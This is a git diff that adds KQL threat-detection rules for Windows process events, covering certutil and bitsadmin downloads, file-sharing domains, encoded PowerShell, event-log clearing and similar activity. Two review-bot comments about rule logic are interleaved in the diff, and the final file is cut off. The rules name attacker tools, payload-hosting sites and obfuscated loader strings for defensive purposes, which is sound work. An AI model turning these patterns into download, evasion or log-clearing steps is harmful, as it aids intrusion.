+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-15
+// Level: high
+// Description: Detects when a user installs certificates by using CertOC.exe to load the target DLL file.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -LoadDLL " or ProcessCommandLine contains " /LoadDLL " or ProcessCommandLine contains " –LoadDLL " or ProcessCommandLine contains " —LoadDLL " or ProcessCommandLine contains " ―LoadDLL ") and (FolderPath endswith "\\certoc.exe" or ProcessVersionInfoOriginalFileName =~ "CertOC.exe") and (ProcessCommandLine contains "\\Appdata\\Local\\Temp\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "C:\\Windows\\Tasks\\" or ProcessCommandLine contains "C:\\Windows\\Temp\\")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_double_extension_file_execution.kql b/KQL/rules/windows/process_creation/suspicious_double_extension_file_execution.kql
new file mode 100644
index 00000000..bf4ad443
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_double_extension_file_execution.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Double Extension File Execution
+// Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-06-26
+// Level: high
+// Description: Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1566.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " .exe" or ProcessCommandLine contains "______.exe" or ProcessCommandLine contains ".doc.exe" or ProcessCommandLine contains ".doc.js" or ProcessCommandLine contains ".docx.exe" or ProcessCommandLine contains ".docx.js" or ProcessCommandLine contains ".gif.exe" or ProcessCommandLine contains ".jpeg.exe" or ProcessCommandLine contains ".jpg.exe" or ProcessCommandLine contains ".mkv.exe" or ProcessCommandLine contains ".mov.exe" or ProcessCommandLine contains ".mp3.exe" or ProcessCommandLine contains ".mp4.exe" or ProcessCommandLine contains ".pdf.exe" or ProcessCommandLine contains ".pdf.js" or ProcessCommandLine contains ".png.exe" or ProcessCommandLine contains ".ppt.exe" or ProcessCommandLine contains ".ppt.js" or ProcessCommandLine contains ".pptx.exe" or ProcessCommandLine contains ".pptx.js" or ProcessCommandLine contains ".rtf.exe" or ProcessCommandLine contains ".rtf.js" or ProcessCommandLine contains ".svg.exe" or ProcessCommandLine contains ".txt.exe" or ProcessCommandLine contains ".txt.js" or ProcessCommandLine contains ".xls.exe" or ProcessCommandLine contains ".xls.js" or ProcessCommandLine contains ".xlsx.exe" or ProcessCommandLine contains ".xlsx.js" or ProcessCommandLine contains "⠀⠀⠀⠀⠀⠀.exe") and (FolderPath endswith " .exe" or FolderPath endswith "______.exe" or FolderPath endswith ".doc.exe" or FolderPath endswith ".doc.js" or FolderPath endswith ".docx.exe" or FolderPath endswith ".docx.js" or
FolderPath endswith ".gif.exe" or FolderPath endswith ".jpeg.exe" or FolderPath endswith ".jpg.exe" or FolderPath endswith ".mkv.exe" or FolderPath endswith ".mov.exe" or FolderPath endswith ".mp3.exe" or FolderPath endswith ".mp4.exe" or FolderPath endswith ".pdf.exe" or FolderPath endswith ".pdf.js" or FolderPath endswith ".png.exe" or FolderPath endswith ".ppt.exe" or FolderPath endswith ".ppt.js" or FolderPath endswith ".pptx.exe" or FolderPath endswith ".pptx.js" or FolderPath endswith ".rtf.exe" or FolderPath endswith ".rtf.js" or FolderPath endswith ".svg.exe" or FolderPath endswith ".txt.exe" or FolderPath endswith ".txt.js" or FolderPath endswith ".xls.exe" or FolderPath endswith ".xls.js" or FolderPath endswith ".xlsx.exe" or FolderPath endswith ".xlsx.js" or FolderPath endswith "⠀⠀⠀⠀⠀⠀.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_download_from_direct_ip_via_bitsadmin.kql b/KQL/rules/windows/process_creation/suspicious_download_from_direct_ip_via_bitsadmin.kql
new file mode 100644
index 00000000..285bb01f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_download_from_direct_ip_via_bitsadmin.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Download From Direct IP Via Bitsadmin
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-06-28
+// Level: high
+// Description: Detects usage of bitsadmin downloading a file using an URL that contains an IP
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "://1" or ProcessCommandLine contains "://2" or ProcessCommandLine contains "://3" or ProcessCommandLine contains "://4" or ProcessCommandLine contains "://5" or ProcessCommandLine contains "://6" or ProcessCommandLine contains "://7" or ProcessCommandLine contains "://8" or ProcessCommandLine contains "://9") and (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe")) and (not(ProcessCommandLine contains "://7-"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_download_from_file_sharing_website_via_bitsadmin.kql b/KQL/rules/windows/process_creation/suspicious_download_from_file_sharing_website_via_bitsadmin.kql
new file mode 100644
index 00000000..95235d26
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_download_from_file_sharing_website_via_bitsadmin.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Download From File-Sharing Website Via Bitsadmin
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-06-28
+// Level: high
+// Description: Detects usage of bitsadmin downloading a file from a suspicious domain
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
+// False Positives:
+// - Some legitimate apps use this, but limited.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "pages.dev" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "trycloudflare.com" or ProcessCommandLine contains "ufile.io" or ProcessCommandLine contains "w3spaces.com" or ProcessCommandLine contains "workers.dev") and (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or
ProcessCommandLine contains " /addfile ") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_download_from_office_domain.kql b/KQL/rules/windows/process_creation/suspicious_download_from_office_domain.kql
new file mode 100644
index 00000000..eae00681
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_download_from_office_domain.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Download from Office Domain
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-12-27
+// Level: high
+// Description: Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.resource-development, attack.t1105, attack.t1608
+// False Positives:
+// - Scripts or tools that download attachments from these domains (OneNote, Outlook 365)
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "https://attachment.outlook.live.net/owa/" or ProcessCommandLine contains "https://onenoteonlinesync.onenote.com/onenoteonlinesync/") and ((FolderPath endswith "\\curl.exe" or FolderPath endswith "\\wget.exe") or (ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "curl " or ProcessCommandLine contains "wget " or ProcessCommandLine contains "Start-BitsTransfer" or ProcessCommandLine contains ".DownloadFile(" or ProcessCommandLine contains ".DownloadString("))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_download_via_certutil_exe.kql b/KQL/rules/windows/process_creation/suspicious_download_via_certutil_exe.kql
new file mode 100644
index 00000000..3b0f2192
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_download_via_certutil_exe.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Download Via Certutil.EXE
+// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-15
+// Level: medium
+// Description: Detects the execution of certutil with certain flags that allow the utility to download files.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "urlcache " or ProcessCommandLine contains "verifyctl " or ProcessCommandLine contains "URL ") and ProcessCommandLine contains "http" and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_driver_dll_installation_via_odbcconf_exe.kql b/KQL/rules/windows/process_creation/suspicious_driver_dll_installation_via_odbcconf_exe.kql
new file mode 100644
index 00000000..fa0fd3fd
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_driver_dll_installation_via_odbcconf_exe.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Driver/DLL Installation Via Odbcconf.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-23
+// Level: high
+// Description: Detects execution of "odbcconf" with the "INSTALLDRIVER" action where the driver doesn't contain a ".dll" extension. This is often used as a defense evasion method.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.008
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "INSTALLDRIVER " and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe")) and (not(ProcessCommandLine contains ".dll"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_driver_install_by_pnputil_exe.kql b/KQL/rules/windows/process_creation/suspicious_driver_install_by_pnputil_exe.kql
new file mode 100644
index 00000000..0cb317b0
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_driver_install_by_pnputil_exe.kql
@@ -0,0 +1,14 @@
+// Title: Suspicious Driver Install by pnputil.exe
+// Author: Hai Vaknin @LuxNoBulIshit, Avihay eldad @aloneliassaf, Austin Songer @austinsonger
+// Date: 2021-09-30
+// Level: medium
+// Description: Detects when a possible suspicious driver is being installed via pnputil.exe lolbin
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547
+// False Positives:
+// - Pnputil.exe being used may be performed by a system administrator.
+// - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
+// - Pnputil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-i" or ProcessCommandLine contains "/install" or ProcessCommandLine contains "-a" or ProcessCommandLine contains "/add-driver" or ProcessCommandLine contains ".inf") and FolderPath endswith "\\pnputil.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_dumpminitool_execution.kql b/KQL/rules/windows/process_creation/suspicious_dumpminitool_execution.kql
new file mode 100644
index 00000000..485a3e51
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_dumpminitool_execution.kql
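Review bot: The `| where` clause of the pnputil rule keys on `ProcessCommandLine contains "-i"` and `ProcessCommandLine contains "-a"`, two-character substrings that match most pnputil invocations and many driver paths (for example `/enum-interfaces`, or any path segment containing `-a`), so in practice the only discriminating predicate is `FolderPath endswith "\\pnputil.exe"`. The selection appears to mirror the upstream Sigma rule rather than being a conversion error, but at level medium it will fire on routine driver administration in environments where pnputil is used. If tuning is wanted, anchoring the short tokens with their surrounding spaces, e.g. `ProcessCommandLine contains " -i " or ProcessCommandLine contains " -a "`, narrows it without dropping the `/install` and `/add-driver` forms; since this file looks generated, that tuning is better applied in the converter or in a local exclusion layer than by editing the output.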
@@ -0,0 +1,10 @@
+// Title: Suspicious DumpMinitool Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-04-06
+// Level: high
+// Description: Detects suspicious ways to use the "DumpMinitool.exe" binary
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.credential-access, attack.t1036, attack.t1003.001
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\DumpMinitool.exe" or FolderPath endswith "\\DumpMinitool.x86.exe" or FolderPath endswith "\\DumpMinitool.arm64.exe") or (ProcessVersionInfoOriginalFileName in~ ("DumpMinitool.exe", "DumpMinitool.x86.exe", "DumpMinitool.arm64.exe"))) and ((not((FolderPath contains "\\Microsoft Visual Studio\\" or FolderPath contains "\\Extensions\\"))) or ProcessCommandLine contains ".txt" or ((ProcessCommandLine contains " Full" or ProcessCommandLine contains " Mini" or ProcessCommandLine contains " WithHeap") and (not(ProcessCommandLine contains "--dumpType"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_electron_application_child_processes.kql b/KQL/rules/windows/process_creation/suspicious_electron_application_child_processes.kql
new file mode 100644
index 00000000..212f96f2
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_electron_application_child_processes.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Electron Application Child Processes
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-21
+// Level: medium
+// Description: Detects suspicious child processes of electron apps (teams, discord, slack, etc.). This could be a potential sign of ".asar" file tampering (See reference section for more information) or binary execution proxy through specific CLI arguments (see related rule)
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where (InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\discord.exe" or InitiatingProcessFolderPath endswith "\\GitHubDesktop.exe" or InitiatingProcessFolderPath endswith "\\keybase.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe" or InitiatingProcessFolderPath endswith "\\msteams.exe" or InitiatingProcessFolderPath endswith "\\slack.exe" or InitiatingProcessFolderPath endswith "\\teams.exe") and ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains ":\\ProgramData\\" or FolderPath contains ":\\Temp\\" or FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\Windows\\Temp\\")) and (not((ProcessCommandLine contains "\\NVSMI\\nvidia-smi.exe" and FolderPath endswith "\\cmd.exe" and InitiatingProcessFolderPath endswith "\\Discord.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_encoded_and_obfuscated_reflection_assembly_load_function_call.kql b/KQL/rules/windows/process_creation/suspicious_encoded_and_obfuscated_reflection_assembly_load_function_call.kql
new file mode 100644
index 00000000..557b32bc
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_encoded_and_obfuscated_reflection_assembly_load_function_call.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call
+// Author: pH-T (Nextron Systems)
+// Date: 2022-03-01
+// Level: high
+// Description: Detects suspicious base64 encoded and obfuscated "LOAD" keyword used in .NET "reflection.assembly"
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1059.001, attack.t1027
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "OgA6ACgAIgBMACIAKwAiAG8AYQBkACIAKQ" or ProcessCommandLine contains "oAOgAoACIATAAiACsAIgBvAGEAZAAiACkA" or ProcessCommandLine contains "6ADoAKAAiAEwAIgArACIAbwBhAGQAIgApA" or ProcessCommandLine contains "OgA6ACgAIgBMAG8AIgArACIAYQBkACIAKQ" or ProcessCommandLine contains "oAOgAoACIATABvACIAKwAiAGEAZAAiACkA" or ProcessCommandLine contains "6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApA" or ProcessCommandLine contains "OgA6ACgAIgBMAG8AYQAiACsAIgBkACIAKQ" or ProcessCommandLine contains "oAOgAoACIATABvAGEAIgArACIAZAAiACkA" or ProcessCommandLine contains "6ADoAKAAiAEwAbwBhACIAKwAiAGQAIgApA" or ProcessCommandLine contains "OgA6ACgAJwBMACcAKwAnAG8AYQBkACcAKQ" or ProcessCommandLine contains "oAOgAoACcATAAnACsAJwBvAGEAZAAnACkA" or ProcessCommandLine contains "6ADoAKAAnAEwAJwArACcAbwBhAGQAJwApA" or ProcessCommandLine contains "OgA6ACgAJwBMAG8AJwArACcAYQBkACcAKQ" or ProcessCommandLine contains "oAOgAoACcATABvACcAKwAnAGEAZAAnACkA" or ProcessCommandLine contains "6ADoAKAAnAEwAbwAnACsAJwBhAGQAJwApA" or ProcessCommandLine contains "OgA6ACgAJwBMAG8AYQAnACsAJwBkACcAKQ" or ProcessCommandLine contains "oAOgAoACcATABvAGEAJwArACcAZAAnACkA" or ProcessCommandLine contains "6ADoAKAAnAEwAbwBhACcAKwAnAGQAJwApA"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_encoded_powershell_command_line.kql b/KQL/rules/windows/process_creation/suspicious_encoded_powershell_command_line.kql
new file mode 100644
index 00000000..b4c94242
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_encoded_powershell_command_line.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Encoded PowerShell Command Line
+// Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community
+// Date: 2018-09-03
+// Level: high
+// Description: Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (((ProcessCommandLine contains " JAB" or ProcessCommandLine contains " SUVYI" or ProcessCommandLine contains " SQBFAFgA" or ProcessCommandLine contains " aQBlAHgA" or ProcessCommandLine contains " aWV4I" or ProcessCommandLine contains " IAA" or ProcessCommandLine contains " IAB" or ProcessCommandLine contains " UwB" or ProcessCommandLine contains " cwB") and ProcessCommandLine contains " -e") or (ProcessCommandLine contains ".exe -ENCOD " or ProcessCommandLine contains " BA^J e-")) and (not(ProcessCommandLine contains " -ExecutionPolicy remotesigned "))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_eventlog_clearing_or_configuration_change_activity.kql b/KQL/rules/windows/process_creation/suspicious_eventlog_clearing_or_configuration_change_activity.kql
new file mode 100644
index 00000000..bf5ff25f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_eventlog_clearing_or_configuration_change_activity.kql
@@ -0,0 +1,15 @@
+// Title: Suspicious Eventlog Clearing or Configuration Change Activity
+// Author: Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105, Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2019-09-26
+// Level: high
+// Description: Detects the clearing or configuration tampering of EventLog using utilities such as "wevtutil", "powershell" and "wmic".
+// This technique were seen used by threat actors and ransomware strains in order to evade defenses.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.001, attack.t1562.002, car.2016-04-002
+// False Positives:
+// - Admin activity
+// - Scripts and administrative tools used in the monitored environment
+// - Maintenance activity
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "clear-log " or ProcessCommandLine contains " cl " or ProcessCommandLine contains "set-log " or ProcessCommandLine contains " sl " or ProcessCommandLine contains "lfn:") and (FolderPath endswith "\\wevtutil.exe" or ProcessVersionInfoOriginalFileName =~ "wevtutil.exe")) or (((ProcessCommandLine contains "Clear-EventLog " or ProcessCommandLine contains "Remove-EventLog " or ProcessCommandLine contains "Limit-EventLog " or ProcessCommandLine contains "Clear-WinEvent ") or (ProcessCommandLine contains "Eventing.Reader.EventLogSession" and ProcessCommandLine contains "ClearLog") or (ProcessCommandLine contains "Diagnostics.EventLog" and ProcessCommandLine contains "Clear")) and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe")) or ((ProcessCommandLine contains "ClearEventLog" and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wmic.exe")) and (not((ProcessCommandLine contains " sl " and (InitiatingProcessFolderPath in~ ("C:\\Windows\\SysWOW64\\msiexec.exe", "C:\\Windows\\System32\\msiexec.exe"))))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_execution_from_outlook_temporary_folder.kql b/KQL/rules/windows/process_creation/suspicious_execution_from_outlook_temporary_folder.kql
new file mode 100644
index 00000000..35e2a350
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_execution_from_outlook_temporary_folder.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Execution From Outlook Temporary Folder
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-10-01
+// Level: high
+// Description: Detects a suspicious program execution in Outlook temp folder
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1566.001
+
+DeviceProcessEvents
+| where FolderPath contains "\\Temporary Internet Files\\Content.Outlook\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_execution_location_of_wermgr_exe.kql b/KQL/rules/windows/process_creation/suspicious_execution_location_of_wermgr_exe.kql
new file mode 100644
index 00000000..f0985def
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_execution_location_of_wermgr_exe.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Execution Location Of Wermgr.EXE
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-10-14
+// Level: high
+// Description: Detects suspicious Windows Error Reporting manager (wermgr.exe) execution location.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where FolderPath endswith "\\wermgr.exe" and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_execution_of_hostname.kql b/KQL/rules/windows/process_creation/suspicious_execution_of_hostname.kql
new file mode 100644
index 00000000..9092079b
--- /dev/null
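Review bot: In suspicious_eventlog_clearing_or_configuration_change_activity.kql the msiexec exclusion at the end of the `| where` is parenthesised so that it only narrows the third OR branch (`ProcessCommandLine contains "ClearEventLog"` via powershell/wmic), while the `" sl "` substring it excludes is what the first branch (wevtutil `set-log` / ` sl `) matches on, so an msiexec-spawned `wevtutil sl` still fires; presumably the filter was meant to apply to all three selections, as a `... and not filter` condition would in the source rule. The fix is to close the three OR'ed selections in one pair of parentheses and append the exclusion once, i.e. `| where ((<wevtutil selection>) or (<powershell selection>) or (<ClearEventLog selection>)) and (not((ProcessCommandLine contains " sl " and (InitiatingProcessFolderPath in~ ("C:\\Windows\\SysWOW64\\msiexec.exe", "C:\\Windows\\System32\\msiexec.exe")))))` with the angle-bracket placeholders standing for the existing branch text. If this precedence comes from how the converter renders a multi-selection condition with a filter, the same shape is likely to recur in other generated rules and is worth fixing at the generator rather than in this file.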
+++ b/KQL/rules/windows/process_creation/suspicious_execution_of_hostname.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Execution of Hostname
+// Author: frack113
+// Date: 2022-01-01
+// Level: low
+// Description: Use of hostname to get information
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082
+
+DeviceProcessEvents
+| where FolderPath endswith "\\HOSTNAME.EXE"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_execution_of_installutil_without_log.kql b/KQL/rules/windows/process_creation/suspicious_execution_of_installutil_without_log.kql
new file mode 100644
index 00000000..6ea7768f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_execution_of_installutil_without_log.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Execution of InstallUtil Without Log
+// Author: frack113
+// Date: 2022-01-23
+// Level: medium
+// Description: Uses the .NET InstallUtil.exe application in order to execute image without log
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/logfile= " and ProcessCommandLine contains "/LogToConsole=false") and FolderPath contains "Microsoft.NET\\Framework" and FolderPath endswith "\\InstallUtil.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_execution_of_powershell_with_base64.kql b/KQL/rules/windows/process_creation/suspicious_execution_of_powershell_with_base64.kql
new file mode 100644
index 00000000..fbe91752
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_execution_of_powershell_with_base64.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Execution of Powershell with Base64
+// Author: frack113
+// Date: 2022-01-02
+// Level: medium
+// Description: Commandline to launch powershell with a base64 payload
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " -e " or ProcessCommandLine contains " -en " or ProcessCommandLine contains " -enc " or ProcessCommandLine contains " -enco" or ProcessCommandLine contains " -ec ") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) and (not(((InitiatingProcessFolderPath contains "C:\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or InitiatingProcessFolderPath contains "\\gc_worker.exe") or ProcessCommandLine contains " -Encoding ")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_execution_of_shutdown.kql b/KQL/rules/windows/process_creation/suspicious_execution_of_shutdown.kql
new file mode 100644
index 00000000..20ce224e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_execution_of_shutdown.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Execution of Shutdown
+// Author: frack113
+// Date: 2022-01-01
+// Level: medium
+// Description: Use of the commandline to shutdown or reboot windows
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1529
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/r " or ProcessCommandLine contains "/s ") and FolderPath endswith "\\shutdown.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_execution_of_shutdown_to_log_out.kql b/KQL/rules/windows/process_creation/suspicious_execution_of_shutdown_to_log_out.kql
new file mode 100644
index 00000000..95afeb96
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_execution_of_shutdown_to_log_out.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Execution of Shutdown to Log Out
+// Author: frack113
+// Date: 2022-10-01
+// Level: medium
+// Description: Detects the rare use of the command line tool shutdown to logoff a user
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1529
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "/l" and FolderPath endswith "\\shutdown.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_execution_of_systeminfo.kql b/KQL/rules/windows/process_creation/suspicious_execution_of_systeminfo.kql
new file mode 100644
index 00000000..4df7244e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_execution_of_systeminfo.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Execution of Systeminfo
+// Author: frack113
+// Date: 2022-01-01
+// Level: low
+// Description: Detects usage of the "systeminfo" command to retrieve information
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082
+
+DeviceProcessEvents
+| where FolderPath endswith "\\systeminfo.exe" or ProcessVersionInfoOriginalFileName =~ "sysinfo.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_explorer_process_with_whitespace_padding_clickfix_filefix.kql b/KQL/rules/windows/process_creation/suspicious_explorer_process_with_whitespace_padding_clickfix_filefix.kql
new file mode 100644
index 00000000..367eadf6
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_explorer_process_with_whitespace_padding_clickfix_filefix.kql
